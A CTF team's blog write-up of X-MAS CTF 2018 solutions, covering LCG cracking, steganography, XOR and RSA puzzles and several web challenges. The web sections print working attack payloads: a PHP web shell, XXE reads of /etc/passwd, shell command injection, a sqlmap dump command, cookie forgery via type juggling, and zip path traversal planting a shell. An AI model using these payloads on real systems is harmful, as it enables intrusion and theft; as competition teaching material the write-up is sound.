Dec 22, 2018 · 13 min read

X-MAS CTF is a week-long Capture The Flag competition created by the Romanian high-school CTF team HTsP (`Hecării, Țuica și Păunii`).
Our team, hackstreetboys, participated and managed to finish in 10th place out of 1378 teams.

# Web/Crypto

This category was meant to have only one challenge, Let’s Crack the Great lapland, but some participants managed to brute-force or guess the next value, so the authors created another challenge, Let’s Crack the Greater lapland, which is solved using the intended approach.

## Let’s Crack the Great lapland

“Psst, I got a task for you. There’s this monolith to which I need to get access, but I can’t get the numbers right. Can you help me? I pay well.” ~ A shady dealer gnome

Server: http://199.247.6.180:12000
Authors: Milkdrop + Gabies

## Let’s Crack the Greater lapland

“Hey, do you remember that monolith I had to get in last week? Now I stumbled upon something greater and shinier! Can you help me get access to this one?” ~ The same shady dealer gnome

Server: http://199.247.6.180:12006
Authors: Milkdrop + Gabies

## Solution

By looking carefully at the challenge title (Let’s Crack the Great lapland), we found out that this is about LCG.

Linear Congruential Generator or LCG is an algorithm that yields a sequence of pseudo–randomized numbers calculated with a discontinuous piecewise linear equation.

The generator is defined by the recurrence relation `x(n+1) = (a*x(n) + b) mod m`, where `x` is the sequence of pseudorandom values, `m` is the modulus, `a` is the multiplier, and `b` is the increment.

The objective is to collect the first few numbers of the sequence from the webpage and use them to recover the modulus, multiplier, and increment.

By the way, thanks to mcm of team p4 for the detailed blog post about cracking LCGs: https://tailcall.net/blog/cracking-randomness-lcgs/

To get the modulus, the following code was used (`x` holds the consecutive outputs collected from the webpage):

```python
from math import gcd

y = []  # first differences: y[i] = x[i+1] - x[i]
z = []  # each entry is a multiple of the modulus
for element in range(len(x) - 1):
    y.append(x[element + 1] - x[element])
for element in range(len(y) - 2):
    z.append(abs(y[element + 2] * y[element] - y[element + 1] ** 2))
m = gcd(gcd(z[0], z[1]), z[2])
```

To get the multiplier, the following code was used (`invert` is the modular inverse from gmpy2; on Python 3.8+ `pow(v, -1, m)` does the same):

```python
from gmpy2 import invert

a = (x[2] - x[1]) * invert(x[1] - x[0], m) % m
```

To get the increment, the following code was used:

```python
b = (x[1] - a * x[0]) % m
```

Once the modulus, multiplier, and increment are obtained, we can use the following formula to predict the next numbers of the monolith:

`x(n+1) = (a*x(n) + b) mod m`
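As an added worked example (my own code, not the writeup's), here is the whole recovery put together: a few outputs are generated from a small LCG with constructed parameters a=7, b=3, m=101 and seed 5, then m, a and b are recovered from those outputs alone and the next value is predicted. It generalises the three snippets above by taking the gcd over every available candidate, which helps when the first few are a multiple of m.

```python
from math import gcd

def lcg_outputs(seed, a, b, m, count):
    """Return `count` consecutive outputs of x(n+1) = (a*x(n) + b) mod m."""
    out, x = [], seed
    for _ in range(count):
        x = (a * x + b) % m
        out.append(x)
    return out

def recover_modulus(x):
    """The differences t(i) = x(i+1) - x(i) satisfy t(i+1) = a*t(i) mod m, so
    t(i+2)*t(i) - t(i+1)**2 is a multiple of m. The gcd over all such values
    is m itself, or a small multiple of m when only a few outputs are known."""
    t = [x[i + 1] - x[i] for i in range(len(x) - 1)]
    z = [abs(t[i + 2] * t[i] - t[i + 1] ** 2) for i in range(len(t) - 2)]
    m = 0
    for v in z:
        m = gcd(m, v)
    return m

def recover_params(x):
    """Recover (a, b, m) from at least five consecutive outputs."""
    m = recover_modulus(x)
    # a = (x2 - x1) * (x1 - x0)^-1 mod m; pow(v, -1, m) needs Python 3.8+
    a = (x[2] - x[1]) * pow(x[1] - x[0], -1, m) % m
    b = (x[1] - a * x[0]) % m
    return a, b, m

def predict_next(x, a, b, m):
    """Next output after the last observed one."""
    return (a * x[-1] + b) % m

if __name__ == "__main__":
    # Constructed parameters for the demonstration, not the challenge's.
    observed = lcg_outputs(5, 7, 3, 101, 8)
    a, b, m = recover_params(observed)
    print("observed :", observed)
    print("recovered: a=%d b=%d m=%d" % (a, b, m))
    print("next     :", predict_next(observed, a, b, m))
```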

## Flags

Let’s Crack the Great lapland
`X-MAS{LCG_0n_7h3_LapL4nd_m0n0LiTh_1s_n0t_7ha7_s3cur3}`

Let’s Crack the Greater lapland
`X-MAS{Bru73_F0rc3_1s_gr34t_bu7_LCG_1s_b3tt3r___}`

# Web

Most of the challenges were fun, but one of them was not good at all: you just had to change the value of a parameter to get the flag.

## GnomeArena: Rock Paper Scissors

This challenge was solved by my other teammate, either SymR or Ameer.

This new website is all the rage for every gnome in Lapland! How many games of Rock Paper Scissors can you win?

Server: http://199.247.6.180:12002
Author: Milkdrop

## Solution

• The website hosts a Rock, Paper, Scissors game, but I noticed that there is a settings page that allows us to upload a file and modify our game name.
• After analyzing the settings page, I learned that the GAME NAME is the FILE NAME of the PROFILE IMAGE and that I can upload PHP files as the PROFILE IMAGE.
`<?php system($_GET['cmd']); ?>`

Flag: `X-MAS{Ev3ry0ne_m0ve_aw4y_th3_h4ck3r_gn0m3_1s_1n_t0wn}`

## Gnome’s BU77ons

This challenge was solved by my other teammate, either SymR or Ameer.

Who wouldn’t enjoy pressing random buttons? Yeah, I guessed so! This time though, the bu77on isn’t random…

Server: http://199.247.6.180:12004

## Solution

• Just change the value of the `button` parameter from `Click here boai` to `flag`.

Flag: `X-MAS{PhPs_A1n7_m4d3_f0r_bu77_0ns___:)}`

## Our Christmas Wishlist

We have all gathered round to write down our wishes and desires for this Christmas! Please don’t write anything mean, Santa will be reading this!

Server: http://199.247.6.180:12001
Author: Milkdrop

## Solution

• Based on the POST request, the data to be posted has the content type `application/xml`. Therefore, this challenge could be vulnerable to XML External Entity injection, also known as XXE.
• Using the following payload, we were able to retrieve the passwd file:
`<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><message>&xxe;</message>`
• Using the following payload, we were able to obtain the flag:
`<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=flag.txt">]><message>&xxe;</message>`

Flag: `X-MAS{_The_Ex73rnal_Ent1t13$_W4n7_To__Jo1n_7he_p4r7y__700______}`

## Santa’s Helper Mechagnome

One of our main production Mechagnomes is now malfunctioning. You have to access its control panel by directly messaging Helper Mechagnome#9926 (You can find him resting on our main discord server).

Get the restart codes, and restart it so that our toy factory can continue working!

Author: Milkdrop

## Solution

• The MechaGnome#9926 control panel can execute the following commands: help, joke, add, list, sendletter, restart.
• The only important commands are list, sendletter, and restart.
• Executing the list command gives us these emails:
`- randdev@santa.com - toyfactory@santa.com - weaponsilo@santa.com - commandcenter@santa.com - test@santa.com - LOLOLOL@santa.com`
• Executing the sendletter command requires two parameters: email and message (sendletter email message).
• After trying many payloads in the message parameter, the following command gave us the list of files in the control panel:
`sendletter commandcenter@santa.com *`
`mecha.py robot_restart_codes.txt`
• Executing the following command gives us the content of robot_restart_codes.txt:
`sendletter commandcenter@santa.com $(cat robot_restart_codes.txt)`
`Cobalt Inc. MechaGnome Restart Codes:\r XJACO-10U4C-C091U-VNOAC-J2QCS`
• Executing `restart XJACO-10U4C-C091U-VNOAC-J2QCS` restarts the bot and gives us the flag.

Flag: `X-MAS{Wh0_Kn3W_4_H3lp3r_M3ch4gN0m3_W0uLd_b3_S0_vULN3R4bL3}`

## Santa’s lucky number

This challenge was solved by my other teammate, either SymR or Ameer.

Come on! Santa’s lucky number is pretty predictable, don’t you think? ;)

Server: http://199.247.6.180:12005

## Solution

• Visiting the website greets us with an image of a book, 3 buttons and a hint: `Santa loves hiding his secrets on the page numbered as his lucky number :)`
• Clicking each button gives us a random hash.
• Using Burp Suite Intruder, I sequentially requested page numbers from 0 to 5,000 and found out that page number 1327 triggers our Grep Match option, which returns the flag.

Flag: `X-MAS{W00pS_S0m30n3_73l1_S4n7a_h1s_c00k1eS_Ar3_BuRn1ng}`

Ameer and I collaborated to solve this challenge. Ameer found that the User-Agent header is vulnerable to blind SQL injection.

We all know that Santa is quite an old man. He sometimes forgets things. Including his password.

Therefore, our high-tech gnomegineer department worked the whole last night to develop a new login system, that requires no passwords! Nifty.

Server: http://199.247.6.180:12003
Author: Milkdrop

## Solution

• The hint in the challenge is “You don’t seem to be using an official Computer from Santa’s Laboratory!”, which means that we have to do something with the User-Agent header.
• Adding `' or '1'='1` to the User-Agent changes “Access Denied!” to “Welcome!”.
• Using sqlmap, we found out that the User-Agent is vulnerable to `boolean-based blind`, `error-based` and `AND/OR time-based` SQL injection.
• The following command was executed to dump the flag from the database:
`sqlmap.py -u http://199.247.6.180:12003/ --user-agent="' *" --level=5 --risk=3 --dbms=mysql --dump`

Flag: `X-MAS{EV3RY0NE_F34R5_TH3_BL1ND_GN0M3}`

Ameer solved this challenge because I fell asleep and forgot to submit the flag, hihi.

Server: http://199.247.6.180:12008

## Solution

• There are two cookies on the website: one is named `adminpass` and the other `cookiez`.
• The value of `cookiez` is base64-encoded 3 times, and the decoded value is `{"id":"2","type":"guest"}`.
• I changed the value of `cookiez` to `{"id":"1","type":"admin"}` and encoded it 3 times.
• Going back to the `adminpass` cookie, I just appended `[]` to its name to make it `adminpass[]`. Why? Because PHP parses a parameter named like this as an array. Luckily, this challenge uses strcmp() on our cookie and checks the result against 0 with PHP’s loose comparison (type juggling): strcmp() given an array returns NULL instead of a number, and NULL == 0 is true.
`NULL == 0 will return true`.
`Cookie: adminpass[]=MyLittleCookie!; cookiez=WlhsS2NGcERTVFpKYWtWcFRFTktNR1ZZUW14SmFtOXBXVmRTZEdGWE5HbG1VVDA5Q2c9PQo=;`

Flag: `X-MAS{S4n74_L0v35__C00kiesss_And_Juggl1ng!}`

## Super Secure Siberian Vault

Ever wondered where Santa might keep his most personal secrets? In the most securized Siberian vault of course! Today, the concrete and steel facility has opened to the public, and you can now use it to safeguard your very own personal secrets too, just like Santa!

Pro Tip: You can upload archives to store multiple secrets at the same time.

Server: 199.247.6.180:12007

## Solution

• The tip (or hint) suggests that the file type we need to upload is an archive. It could be tar, xz, jar, rar, zip, etc.
• I tried a lot just to determine which kind of archive I should use for this attack and decided to stick with zip to save time. Also, the Vault accepts archives of up to 2 KB only.
• I tried a zip symlink but had no success. Then I found a blog post about directory traversal in archives. Basically, we can perform directory traversal inside the zip file, and the PHP script will execute the exploit for us when it decompresses the archive.
• In the blog post mentioned above, they wrote a Python script that creates a zip file containing files whose names include a directory traversal. Using this script, we were able to create the payload:
```
./evilarc.py hackstreetboys.php -p img -o unix -d 2
```
-p = Path to include in filename after traversal.
-o = OS platform for archive (you can choose either win or unix).
-d = Number of directories to traverse.
• The command above creates `evil.zip`; after uploading it to the website, the PHP script decompresses the zip file and stores `hackstreetboys.php` in the `img` directory.
• To access the uploaded file, we visit `http://199.247.6.180:12007/img/hackstreetboys.php`, and we can now finally perform command execution.
• The final link is `http://199.247.6.180:12007/img/hackstreetboys.php?cmd=cat ../flag.txt`
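As an added defensive example (my own code, not the writeup's and not the challenge's), here is the check the vault's extraction step was missing: every archive member name is resolved against the destination directory and rejected if it escapes it. An archive of the kind evilarc produces is constructed in memory to show the check firing; Python's own ZipFile.extract() already strips traversal components, but the explicit check makes the policy visible and is what a hand-rolled extractor has to do itself.

```python
import io
import os
import tempfile
import zipfile

def build_zip(entries):
    """Constructed in-memory zip from {member_name: bytes}. Names are stored
    exactly as given, so a traversal name like '../x' survives."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()

def safe_members(zip_bytes, dest):
    """Split members into (accepted, rejected): a member is rejected when its
    name, joined to dest and resolved, would land outside dest."""
    dest_real = os.path.realpath(dest)
    accepted, rejected = [], []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            target = os.path.realpath(os.path.join(dest_real, info.filename))
            if os.path.commonpath([dest_real, target]) != dest_real:
                rejected.append(info.filename)
            else:
                accepted.append(info.filename)
    return accepted, rejected

def safe_extract(zip_bytes, dest):
    """Extract only the accepted members; return the rejected names so the
    upload handler can log them or refuse the whole archive."""
    accepted, rejected = safe_members(zip_bytes, dest)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in accepted:
            zf.extract(name, dest)
    return rejected

def demo():
    """Constructed archive: one harmless member and one evilarc-style member
    that tries to climb two directories up and into img/."""
    evil = build_zip({
        "readme.txt": b"harmless\n",
        "../../img/hackstreetboys.php": b"<?php /* placeholder */ ?>",
    })
    dest = tempfile.mkdtemp()
    rejected = safe_extract(evil, dest)
    return sorted(os.listdir(dest)), rejected

if __name__ == "__main__":
    print(demo())  # (['readme.txt'], ['../../img/hackstreetboys.php'])
```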

Flag: `X-MAS{Z1pp3r_D0wn_S4nt4!_Y0ur_Secr3t5_4r3_n0w_0ur5}`

# Others

## MISC: Weird Transmission

This challenge was one of the hardest: only a little over 20 teams managed to solve it, including ours.

We have intercepted a weird transmission coming from an unidentified radio station from the North Pole. Please decode it for us, it seems important.

transmission.mp3

Author: PinkiePie1189

## Solution

• Playing the audio file greets us with a male voice, but we cannot clearly understand him. Fortunately, reversing the audio helps us understand him and his message.
• Transcribing the audio gives us this message:
```text
Dear CTF player, you have exploited littlewho's binaries, deciphered Gabies' cryptography, hack your way into Milkdrop's websites and done some forensic analysis with Googal, now another challenge awaits.
The evil Grinch is holding Santa hostage in an undisclosed location we don't know his exact position.
With a nice elf has told us the coordinates of nearby points.
The first one is located at (511716656388765455430016138955706839007890052532, 1622805609316535864254436412730925222158623332074)
The second one is at (390390142500834541752332649936545354218395003257, 176460719206642987153469086794475382972064519404)
And the last one is at (608097554835704767294367078594102923662585120876, 195121033653477539025103641752423493583135321761)
He also told us that Santa's home will be located where the shape formed by these three points is in complete equilibrium.
Good luck and Merry Christmas.
```
• Plotting those coordinates on the world map gives us nothing; it is just a rabbit hole.
• I requested a hint and they told me that this is a geometry challenge.
• I quickly searched Google for formulas related to geometry and found analytic geometry’s formula for the centroid, mainly because it uses the coordinates of the three vertices of a triangle.
• The following is the formula used to calculate the centroid:
`centroid = ((x1 + x2 + x3)/3, (y1 + y2 + y3)/3);`
• The following is the simple Python script that calculates the centroid of the coordinates from the audio:
```python
x1 = 511716656388765455430016138955706839007890052532
x2 = 390390142500834541752332649936545354218395003257
x3 = 608097554835704767294367078594102923662585120876
y1 = 1622805609316535864254436412730925222158623332074
y2 = 176460719206642987153469086794475382972064519404
y3 = 195121033653477539025103641752423493583135321761
# Integer division: on Python 3, '/' would give a float and lose
# the low digits of these roughly 160-bit values.
centroid = ((x1 + x2 + x3) // 3, (y1 + y2 + y3) // 3)
print(centroid)
```
• The result is `(503401451241768254825571955828785038962956725555, 664795787392218796811003047092608032904607724413)`
• The centroid values above are in decimal (base 10); I converted them to hex (base 16) and then to ASCII to get the flag.
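An added Python 3 version (my own, not the writeup's script) that carries the computation through to the last step described above: each centroid coordinate is written out as the bytes its hex digits represent and read as ASCII, x part followed by y part.

```python
# Coordinates as transcribed from the audio in the writeup.
POINTS = [
    (511716656388765455430016138955706839007890052532,
     1622805609316535864254436412730925222158623332074),
    (390390142500834541752332649936545354218395003257,
     176460719206642987153469086794475382972064519404),
    (608097554835704767294367078594102923662585120876,
     195121033653477539025103641752423493583135321761),
]

def centroid(points):
    """Centroid of a triangle: the arithmetic mean of its vertices.
    Integer division keeps full precision on these ~160-bit values."""
    xs = sum(p[0] for p in points)
    ys = sum(p[1] for p in points)
    return xs // len(points), ys // len(points)

def int_to_ascii(n):
    """Big-endian bytes of n (i.e. its hex digits, two per byte) as text."""
    return n.to_bytes((n.bit_length() + 7) // 8, "big").decode("ascii")

def decode_flag(points):
    """x coordinate decoded, then y coordinate decoded."""
    cx, cy = centroid(points)
    return int_to_ascii(cx) + int_to_ascii(cy)

if __name__ == "__main__":
    print(centroid(POINTS))
    print(decode_flag(POINTS))
```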

Flag: `X-MAS{An4ly71c_G30m3try_S4v3d_Chr157m4s}`

## FORENSICS: Hidden in almost plain sight

My teammate hightail and I solved this challenge. At first, we thought it would be easy because you would just do simple forensics on a picture, but it turned out to be a steganography challenge.

A strange file was sent to Santa’s email address and he is puzzled. Help him find what’s wrong with the file and you can keep any flag you find in the process.

## Solution

• A file named celebration was given in the challenge.
• After checking the file header, I noticed a familiar hex signature.
• The `2nd` and `3rd` bytes of the file are missing, but I already knew that this is a PNG file because `89 XX XX 47 0d 0a 1a 0a` matches the PNG hex signature.
• Adding `50 4E` as the `2nd` and `3rd` bytes gives us the image.
• I wasted too much time trying different steg tools on this challenge, so I asked for a hint and they told me that I needed to adjust something in the image.
• Using TweakPNG, I edited the height of the image and finally obtained the flag.
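An added example (my own code, not the writeup's tooling) of the two edits made by hand above, done on a minimal PNG constructed in memory: restore the signature bytes `50 4E`, then rewrite the IHDR height and recompute the chunk's CRC, which is what TweakPNG does behind the scenes. The PNG here holds only an IHDR and an IEND chunk and is built purely for the demonstration.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"  # 89 50 4E 47 0D 0A 1A 0A

def chunk(ctype, data):
    """Encode one PNG chunk: length, type, data, CRC32 over type + data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)

def minimal_png(width, height):
    """Constructed PNG with only IHDR and IEND (no pixel data)."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return PNG_SIG + chunk(b"IHDR", ihdr) + chunk(b"IEND", b"")

def repair_signature(data):
    """Restore a PNG whose 2nd and 3rd bytes were overwritten, as in the
    challenge file; the remaining signature bytes must still match."""
    if data[0:1] == b"\x89" and data[3:8] == PNG_SIG[3:8]:
        return PNG_SIG + data[8:]
    raise ValueError("not a damaged PNG signature")

def read_ihdr(data):
    """Return (width, height) from the IHDR chunk after verifying its CRC."""
    length, = struct.unpack(">I", data[8:12])
    ctype, body = data[12:16], data[16:16 + length]
    crc, = struct.unpack(">I", data[16 + length:20 + length])
    if ctype != b"IHDR" or crc != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
        raise ValueError("bad IHDR chunk or CRC")
    return struct.unpack(">II", body[:8])

def set_height(data, new_height):
    """Rewrite the IHDR height and its CRC; a stale CRC is what makes
    strict decoders reject a hand-edited file."""
    body = bytearray(data[16:29])          # the 13 IHDR data bytes
    body[4:8] = struct.pack(">I", new_height)
    return data[:8] + chunk(b"IHDR", bytes(body)) + data[33:]

if __name__ == "__main__":
    png = minimal_png(640, 480)
    damaged = png[:1] + b"\x00\x00" + png[3:]
    fixed = repair_signature(damaged)
    print(read_ihdr(fixed), read_ihdr(set_height(fixed, 1200)))
```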

Flag: `X-MAS{who_knows_wh3re_s4anta_hid3s_the_g1fts}`

## CRYPTO: Special Christmas Wishlist

My teammate hawkcurry (a legend in crypto) solved this, and I decided to give it a shot (lol) because I want to learn crypto (but it’s hard).

While Santa was looking through the wishlists of the children all around the world he came across a very strange looking one. Help Santa decode the letter in order to fulfill the wishes of this child.

(Flag is Non-Standard)
wishlist.png

UPDATE: flag is lowercase!
Author: Gabies

## Solution

• My teammate hawkcurry told us that the 2nd line from the bottom reads “the flag is”.
• Using this hint, I converted the symbols on the 2nd line from the bottom to letters. Then I started working out the other symbols with the help of the known ones.

Flag: `X-MAS{youaresogoodatsubstitutionciphers}`

We, hackstreetboys, collaborated to solve this challenge.

Authors: Milkdrop + Gabies + PinkiePie1189

## Solution:

• This challenge gave us a file. Based on its content, the authors had XORed the file.
• Using xortool, we brute-forced the file with all 256 possible single-byte keys and found out that it had been XORed with FF.
• After brute-forcing, we executed `file *` and discovered something interesting: a Game Boy Advance ROM image.
• We grabbed the hex signature `7f00 00ea 24ff ae51 699a a221 3d84 820a` of the file and searched Google for its file extension.
• The file extension is `.gba`, and to open that file we need an emulator. We found the Boycott Advance emulator and used it to make the game work.
• When we tried to leave the town, Prof. Oak approached our character and we went to the lab.
• Prof. Oak introduced us to 3 Poke Balls containing different Pokemon.
• Each Pokemon has its own weird name.
• Then we noticed that the variables/parameters n, e, and c are somehow related to RSA.
• We confirmed this after checking the email on the computer.
• The hint is Rapid Secure Alternoflux keys = RSA keys.
• So we copied the values of n, e, and c into our script and solved the RSA to capture the flag.
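As an added example (my own code, not the writeup's and not xortool), the single-byte case that xortool solved here: try all 256 keys and keep the one under which the decoded bytes start with a known file signature. The GBA signature is the one quoted above; the PNG, ZIP and ELF entries and the sample buffer are constructed for the demonstration.

```python
# Signatures to look for after each trial decode. The GBA entry is the
# one quoted in the writeup; the others are common formats for illustration.
MAGICS = {
    "gba": bytes.fromhex("7f0000ea24ffae51699aa2213d84820a"),
    "png": bytes.fromhex("89504e470d0a1a0a"),
    "zip": b"PK\x03\x04",
    "elf": b"\x7fELF",
}

def xor_single(data, key):
    """XOR every byte with the same one-byte key (applying it twice undoes it)."""
    return bytes(b ^ key for b in data)

def find_xor_key(data):
    """Try all 256 one-byte keys and return (key, format) for the first
    decode whose leading bytes match a known signature, or None."""
    head = data[:16]
    for key in range(256):
        trial = xor_single(head, key)
        for name, magic in MAGICS.items():
            if trial.startswith(magic):
                return key, name
    return None

def demo():
    """Constructed sample: the GBA header plus filler, XORed with FF as
    the challenge file was."""
    sample = xor_single(MAGICS["gba"] + b"\x00" * 16, 0xFF)
    return find_xor_key(sample)

if __name__ == "__main__":
    print(demo())  # (255, 'gba')
```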

Flag: `X-MAS{Wh4t_4n_un3xp3ct3d_chr1stm45_pr3s3nt}`

First of all, X-MAS CTF 2018 was really challenging and fun because the challenges were surprisingly well built.

Also, I’d like to say that I am proud of my teammates because they spent some of their holiday time solving challenges in Pwn, Web, Forensics, Misc, Crypto, and Reverse Engineering.

Finally, I hope you learned something from this blog post. As always folks, thank you for reading!!!

Update: My teammate hawkcurry published his writeup for Crypto challenges. Read on: https://github.com/pberba/ctf-solutions/tree/master/20181223_xmasctf

Written by

## hackstreetboys

#### hackstreetboys aka [hsb] is a CTF team from the Philippines
